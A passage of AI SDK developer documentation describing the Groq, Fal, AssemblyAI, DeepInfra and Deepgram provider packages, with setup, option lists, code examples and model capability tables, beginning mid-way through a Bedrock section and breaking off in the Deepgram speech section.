      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Reasoning
`us.anthropic.claude-opus-4-7`
`us.anthropic.claude-opus-4-6-v1`
`us.anthropic.claude-opus-4-5-20251101-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-haiku-4-5-20251001-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`

Migrating to `@ai-sdk/amazon-bedrock` 2.x

The Amazon Bedrock provider was rewritten in version 2.x to remove the dependency on the @aws-sdk/client-bedrock-runtime package.

title: Groq description: Learn how to use Groq.

Groq Provider

The Groq provider contains language model support for the Groq API.

Setup

The Groq provider is available via the @ai-sdk/groq module. You can install it with

Provider Instance

You can import the default provider instance groq from @ai-sdk/groq:

import { groq } from '@ai-sdk/groq';

If you need a customized setup, you can import createGroq from @ai-sdk/groq and create a provider instance with your settings:

import { createGroq } from '@ai-sdk/groq';

const groq = createGroq({
  // custom settings
});

You can use the following optional settings to customize the Groq provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.groq.com/openai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the GROQ_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Groq models using a provider instance. The first argument is the model id, e.g. gemma2-9b-it.

const model = groq('gemma2-9b-it');

Reasoning Models

import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('qwen/qwen3-32b'),
  providerOptions: {
    groq: {
      reasoningFormat: 'parsed',
      reasoningEffort: 'default',
      parallelToolCalls: true, // Enable parallel function calling (default: true)
      user: 'user-123', // Unique identifier for end-user (optional)
      serviceTier: 'flex', // Use flex tier for higher throughput (optional)
    } satisfies GroqLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

The following optional provider options are available for Groq language models:

reasoningFormat 'parsed' | 'raw' | 'hidden'

Controls how reasoning is exposed in the generated text. Only supported by reasoning models like qwen-qwq-32b and deepseek-r1-distill-* models.

For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
reasoningEffort 'low' | 'medium' | 'high' | 'none' | 'default'

Controls the level of effort the model will put into reasoning.
- qwen/qwen3-32b
  - Supported values:
    - none: Disable reasoning. The model will not use any reasoning tokens.
    - default: Enable reasoning.
- gpt-oss20b/gpt-oss120b
  - Supported values:
    - low: Use a low level of reasoning effort.
    - medium: Use a medium level of reasoning effort.
    - high: Use a high level of reasoning effort.
Defaults to default for qwen/qwen3-32b.
structuredOutputs boolean

Whether to use structured outputs.

Defaults to true.

When enabled, object generation will use the json_schema format instead of json_object format, providing more reliable structured outputs.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance.

Defaults to true.

Only used when structuredOutputs is enabled and a schema is provided. See Groq's Structured Outputs documentation for details on strict mode limitations.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help with monitoring and abuse detection.
serviceTier 'on_demand' | 'performance' | 'flex' | 'auto'

Service tier for the request. Defaults to 'on_demand'.
- 'on_demand': Default tier with consistent performance and fairness
- 'performance': Prioritized tier for latency-sensitive workloads
- 'flex': Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures
- 'auto': Uses on_demand rate limits first, then falls back to flex tier if exceeded
For more details about service tiers and their benefits, see Groq's service tiers documentation.

Only Groq reasoning models support the reasoningFormat option.

Structured Outputs

Structured outputs are enabled by default for Groq models. You can disable them by setting the structuredOutputs option to false.

import { groq } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: groq('moonshotai/kimi-k2-instruct-0905'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

You can disable structured outputs for models that don't support them:

import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: groq('gemma2-9b-it'),
  providerOptions: {
    groq: {
      structuredOutputs: false,
    } satisfies GroqLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(z.string()),
        instructions: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a simple pasta recipe in JSON format.',
});

console.log(JSON.stringify(result.output, null, 2));

Example

You can use Groq language models to generate text with the generateText function:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('gemma2-9b-it'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Image Input

Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        {
          type: 'image',
          image: 'https://example.com/image.jpg',
        },
      ],
    },
  ],
});

You can also use base64-encoded images:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';

const imageData = readFileSync('path/to/image.jpg', 'base64');

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image in detail.' },
        {
          type: 'image',
          image: `data:image/jpeg;base64,${imageData}`,
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemma2-9b-it`
`llama-3.1-8b-instant`
`llama-3.3-70b-versatile`
`meta-llama/llama-guard-4-12b`
`deepseek-r1-distill-llama-70b`
`meta-llama/llama-4-maverick-17b-128e-instruct`
`meta-llama/llama-4-scout-17b-16e-instruct`
`meta-llama/llama-prompt-guard-2-22m`
`meta-llama/llama-prompt-guard-2-86m`
`moonshotai/kimi-k2-instruct-0905`
`qwen/qwen3-32b`
`llama-guard-3-8b`
`llama3-70b-8192`
`llama3-8b-8192`
`mixtral-8x7b-32768`
`qwen-qwq-32b`
`qwen-2.5-32b`
`deepseek-r1-distill-qwen-32b`
`openai/gpt-oss-20b`
`openai/gpt-oss-120b`

Browser Search Tool

Supported Models

Browser search is only available for these specific models:

openai/gpt-oss-20b
openai/gpt-oss-120b

Basic Usage

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('openai/gpt-oss-120b'), // Must use supported model
  prompt:
    'What are the latest developments in AI? Please search for recent news.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required', // Ensure the tool is used
});

console.log(result.text);

Streaming Example

import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';

const result = streamText({
  model: groq('openai/gpt-oss-120b'),
  prompt: 'Search for the latest tech news and summarize it.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required',
});

for await (const delta of result.fullStream) {
  if (delta.type === 'text-delta') {
    process.stdout.write(delta.text);
  }
}

Key Features

Interactive Browsing: Navigates websites like a human user
Comprehensive Results: More detailed than traditional search snippets
Server-side Execution: Runs on Groq's infrastructure, no setup required
Powered by Exa: Uses Exa search engine for optimal results
Currently Free: Available at no additional charge during beta

Best Practices

Use toolChoice: 'required' to ensure the browser search is activated
Only supported on openai/gpt-oss-20b and openai/gpt-oss-120b models
The tool works automatically - no configuration parameters needed
Server-side execution means no additional API keys or setup required

Model Validation

The provider automatically validates model compatibility:

// ✅ Supported - will work
const result = await generateText({
  model: groq('openai/gpt-oss-120b'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});

// ❌ Unsupported - will show warning and ignore tool
const result = await generateText({
  model: groq('gemma2-9b-it'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"

Transcription Models

You can create models that call the Groq transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-large-v3.

const model = groq.transcription('whisper-large-v3');

import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    groq: { language: 'en' } satisfies GroqTranscriptionModelOptions,
  },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. Important: Requires responseFormat to be set to 'verbose_json'.
responseFormat string The format of the response. Set to 'verbose_json' to receive timestamps for audio segments and enable timestampGranularities. Set to 'text' to return only the transcribed text. Optional.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-large-v3`
`whisper-large-v3-turbo`

title: Fal description: Learn how to use Fal AI models with the AI SDK.

Fal Provider

Setup

The Fal provider is available via the @ai-sdk/fal module. You can install it with

Provider Instance

You can import the default provider instance fal from @ai-sdk/fal:

import { fal } from '@ai-sdk/fal';

If you need a customized setup, you can import createFal and create a provider instance with your settings:

import { createFal } from '@ai-sdk/fal';

const fal = createFal({
  apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Fal provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Fal image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
import fs from 'fs';

const { image, providerMetadata } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Fal image models may return additional information for the images and the request.

Here are some examples of properties that may be set for each image

providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].contentType; // string, mime type of the image

Model Capabilities

Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.

Model	Description
`fal-ai/flux/dev`	FLUX.1 [dev] model for high-quality image generation
`fal-ai/flux-pro/kontext`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`fal-ai/flux-pro/kontext/max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`fal-ai/flux-lora`	Super fast endpoint for FLUX.1 with LoRA support
`fal-ai/ideogram/character`	Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits
`fal-ai/qwen-image`	Qwen-Image foundation model with significant advances in complex text rendering and precise image editing
`fal-ai/omnigen-v2`	Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more
`fal-ai/bytedance/dreamina/v3.1/text-to-image`	Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details
`fal-ai/recraft/v3/text-to-image`	SOTA in image generation with vector art and brand style capabilities
`fal-ai/wan/v2.2-a14b/text-to-image`	High-resolution, photorealistic images with fine-grained detail

Fal models support the following aspect ratios:

1:1 (square HD)
16:9 (landscape)
9:16 (portrait)
4:3 (landscape)
3:4 (portrait)
16:10 (1280x800)
10:16 (800x1280)
21:9 (2560x1080)
9:21 (1080x2560)

Key features of Fal models include:

Up to 4x faster inference speeds compared to alternatives
Optimized by the Fal Inference Engine™
Support for real-time infrastructure
Cost-effective scaling with pay-per-use pricing
LoRA training capabilities for model personalization

Modify Image

Transform existing images using text prompts.

await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext/max'),
  prompt: {
    text: 'Put a donut next to the flour.',
    images: [
      'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
    ],
  },
});

Images can also be passed as base64-encoded string, a Uint8Array, an ArrayBuffer, or a Buffer. A mask can be passed as well

await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext/max'),
  prompt: {
    text: 'Put a donut next to the flour.',
    images: [imageBuffer],
    mask: maskBuffer,
  },
});

Provider Options

Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:

imageUrl - Reference image URL for image-to-image generation (deprecated, use prompt.images instead)
strength - Controls how much the output differs from the input image
guidanceScale - Controls adherence to the prompt (range: 1-20)
numInferenceSteps - Number of denoising steps (range: 1-50)
enableSafetyChecker - Enable/disable safety filtering
outputFormat - Output format: 'jpeg' or 'png'
syncMode - Wait for completion before returning response
acceleration - Speed of generation: 'none', 'regular', or 'high'
safetyTolerance - Content safety filtering level (1-6, where 1 is strictest)
useMultipleImages - When true, converts multiple input images to image_urls array for models that support multiple images (e.g., fal-ai/flux-2/edit)

Refer to the Fal AI model documentation for model-specific parameters.

Advanced Features

Fal's platform offers several advanced capabilities:

Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
LoRA Training: Train and personalize models in under 5 minutes
Real-time Infrastructure: Enable new user experiences with fast inference times
Scalable Architecture: Scale to thousands of GPUs when needed

For more details about Fal's capabilities and features, visit the Fal AI documentation.

Transcription Models

You can create models that call the Fal transcription API using the .transcription() factory method.

The first argument is the model id without the fal-ai/ prefix e.g. wizper.

const model = fal.transcription('wizper');

import { experimental_transcribe as transcribe } from 'ai';
import { fal, type FalTranscriptionModelOptions } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    fal: { batchSize: 10 } satisfies FalTranscriptionModelOptions,
  },
});

The following provider options are available:

language string Language of the audio file. Defaults to 'en'. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
diarize boolean Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
chunkLevel string Level of the chunks to return. Either 'segment' or 'word'. Default value: "segment" Optional.
version string Version of the model to use. All models are Whisper large variants. Default value: "3" Optional.
batchSize number Batch size for processing. Default value: 64 Optional.
numSpeakers number Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper`
`wizper`

Speech Models

You can create models that call Fal text-to-speech endpoints using the .speech() factory method.

Basic Usage

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';

const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Hello from the AI SDK!',
});

Model Capabilities

Model	Description
`fal-ai/minimax/voice-clone`	Clone a voice from a sample audio and generate speech from text prompts
`fal-ai/minimax/voice-design`	Design a personalized voice from a text description and generate speech from text prompts
`fal-ai/dia-tts/voice-clone`	Clone dialog voices from a sample audio and generate dialogs from text prompts
`fal-ai/minimax/speech-02-hd`	Generate speech from text prompts and different voices
`fal-ai/minimax/speech-02-turbo`	Generate fast speech from text prompts and different voices
`fal-ai/dia-tts`	Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing
`resemble-ai/chatterboxhd/text-to-speech`	Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking

Provider Options

Pass provider-specific options via providerOptions.fal depending on the model:

voice_setting object
- voice_id (string): predefined voice ID
- speed (number): 0.5–2.0
- vol (number): 0–10
- pitch (number): -12–12
- emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
- english_normalization (boolean)
audio_setting object Audio configuration settings specific to the model.
language_boost enum Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
pronunciation_dict object Custom pronunciation dictionary for specific words.

Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.

title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.

AssemblyAI Provider

The AssemblyAI provider contains language model support for the AssemblyAI transcription API.

Setup

The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with

Provider Instance

You can import the default provider instance assemblyai from @ai-sdk/assemblyai:

import { assemblyai } from '@ai-sdk/assemblyai';

If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:

import { createAssemblyAI } from '@ai-sdk/assemblyai';

const assemblyai = createAssemblyAI({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the AssemblyAI provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the AssemblyAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. best.

const model = assemblyai.transcription('best');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.

import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { type AssemblyAITranscriptionModelOptions } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    assemblyai: {
      contentSafety: true,
    } satisfies AssemblyAITranscriptionModelOptions,
  },
});

The following provider options are available:

audioEndAt number

End time of the audio in milliseconds. Optional.
audioStartFrom number

Start time of the audio in milliseconds. Optional.
autoChapters boolean

Whether to automatically generate chapters for the transcription. Optional.
autoHighlights boolean

Whether to automatically generate highlights for the transcription. Optional.
boostParam enum

Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
contentSafety boolean

Whether to enable content safety filtering. Optional.
contentSafetyConfidence number

Confidence threshold for content safety filtering (25-100). Optional.
customSpelling array of objects

Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
disfluencies boolean

Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
entityDetection boolean

Whether to detect entities in the transcription. Optional.
filterProfanity boolean

Whether to filter profanity in the transcription. Optional.
formatText boolean

Whether to format the text in the transcription. Optional.
iabCategories boolean

Whether to include IAB categories in the transcription. Optional.
languageCode string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
languageConfidenceThreshold number

Confidence threshold for language detection. Optional.
languageDetection boolean

Whether to enable language detection. Optional.
multichannel boolean

Whether to process multiple audio channels separately. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
redactPii boolean

Whether to redact personally identifiable information. Optional.
redactPiiAudio boolean

Whether to redact PII in the audio file. Optional.
redactPiiAudioQuality enum

Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
redactPiiPolicies array of enums

Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
redactPiiSub enum

Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
sentimentAnalysis boolean

Whether to perform sentiment analysis on the transcription. Optional.
speakerLabels boolean

Whether to label different speakers in the transcription. Optional.
speakersExpected number

Expected number of speakers in the audio. Optional.
speechThreshold number

Threshold for speech detection (0-1). Optional.
summarization boolean

Whether to generate a summary of the transcription. Optional.
summaryModel enum

Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
summaryType enum

Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
webhookAuthHeaderName string

Name of the authentication header for webhook requests. Optional.
webhookAuthHeaderValue string

Value of the authentication header for webhook requests. Optional.
webhookUrl string

URL to send webhook notifications to. Optional.
wordBoost array of strings

List of words to boost in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`best`
`nano`

title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.

DeepInfra Provider

The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.

Setup

The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:

Provider Instance

You can import the default provider instance deepinfra from @ai-sdk/deepinfra:

import { deepinfra } from '@ai-sdk/deepinfra';

If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:

import { createDeepInfra } from '@ai-sdk/deepinfra';

const deepinfra = createDeepInfra({
  apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepInfra provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1.

Note: Language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

DeepInfra language models can also be used in the streamText function (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`
`meta-llama/Llama-4-Scout-17B-16E-Instruct`
`meta-llama/Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Meta-Llama-3.1-405B-Instruct`
`meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-70B-Instruct`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.2-11B-Vision-Instruct`
`meta-llama/Llama-3.2-90B-Vision-Instruct`
`mistralai/Mixtral-8x7B-Instruct-v0.1`
`deepseek-ai/DeepSeek-V3`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`deepseek-ai/DeepSeek-R1-Turbo`
`nvidia/Llama-3.1-Nemotron-70B-Instruct`
`Qwen/Qwen2-7B-Instruct`
`Qwen/Qwen2.5-72B-Instruct`
`Qwen/Qwen2.5-Coder-32B-Instruct`
`Qwen/QwQ-32B-Preview`
`google/codegemma-7b-it`
`google/gemma-2-9b-it`
`microsoft/WizardLM-2-8x22B`

Image Models

You can create DeepInfra image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model-specific options

You can pass model-specific parameters using the providerOptions.deepinfra field:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    deepinfra: {
      num_inference_steps: 30, // Control the number of denoising steps (1-50)
    },
  },
});

Image Editing

DeepInfra supports image editing through models like Qwen/Qwen-Image-Edit. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  size: '1024x1024',
});

Inpainting with Mask

Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

Multi-Image Combining

Combine multiple reference images into a single output:

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'Create a scene with both animals together, playing as friends',
    images: [cat, dog],
  },
});

Model Capabilities

For models supporting aspect ratios, the following ratios are typically supported: 1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21

For models supporting size parameters, dimensions must typically be:

Multiples of 32
Width and height between 256 and 1440 pixels
Default size is 1024x1024

Model	Dimensions Specification	Notes
`stabilityai/sd3.5`	Aspect Ratio	Premium quality base model, 8B parameters
`black-forest-labs/FLUX-1.1-pro`	Size	Latest state-of-art model with superior prompt following
`black-forest-labs/FLUX-1-schnell`	Size	Fast generation in 1-4 steps
`black-forest-labs/FLUX-1-dev`	Size	Optimized for anatomical accuracy
`black-forest-labs/FLUX-pro`	Size	Flagship Flux model
`black-forest-labs/FLUX.1-Kontext-dev`	Size	Image editing and transformation model
`black-forest-labs/FLUX.1-Kontext-pro`	Size	Professional image editing and transformation
`stabilityai/sd3.5-medium`	Aspect Ratio	Balanced 2.5B parameter model
`stabilityai/sdxl-turbo`	Aspect Ratio	Optimized for fast generation

For more details and pricing information, see the DeepInfra text-to-image models page.

Embedding Models

You can create DeepInfra embedding models using the .embeddingModel() factory method. For more on embedding models with the AI SDK see embed().

import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';

const { embedding } = await embed({
  model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`BAAI/bge-base-en-v1.5`	768	512
`BAAI/bge-large-en-v1.5`	1024	512
`BAAI/bge-m3`	1024	8192
`intfloat/e5-base-v2`	768	512
`intfloat/e5-large-v2`	1024	512
`intfloat/multilingual-e5-large`	1024	512
`sentence-transformers/all-MiniLM-L12-v2`	384	256
`sentence-transformers/all-MiniLM-L6-v2`	384	256
`sentence-transformers/all-mpnet-base-v2`	768	384
`sentence-transformers/clip-ViT-B-32`	512	77
`sentence-transformers/clip-ViT-B-32-multilingual-v1`	512	77
`sentence-transformers/multi-qa-mpnet-base-dot-v1`	768	512
`sentence-transformers/paraphrase-MiniLM-L6-v2`	384	128
`shibing624/text2vec-base-chinese`	768	512
`thenlper/gte-base`	768	512
`thenlper/gte-large`	1024	512

title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.

Deepgram Provider

The Deepgram provider contains language model support for the Deepgram transcription and speech generation APIs.

Setup

The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with

Provider Instance

You can import the default provider instance deepgram from @ai-sdk/deepgram:

import { deepgram } from '@ai-sdk/deepgram';

If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:

import { createDeepgram } from '@ai-sdk/deepgram';

const deepgram = createDeepgram({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Deepgram provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Deepgram text-to-speech API using the .speech() factory method.

The first argument is the model id, which includes the voice. Deepgram embeds the voice directly in the model ID (e.g., aura-2-helena-en).

const model = deepgram.speech('aura-2-helena-en');

You can use the model with the generateSpeech function:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';

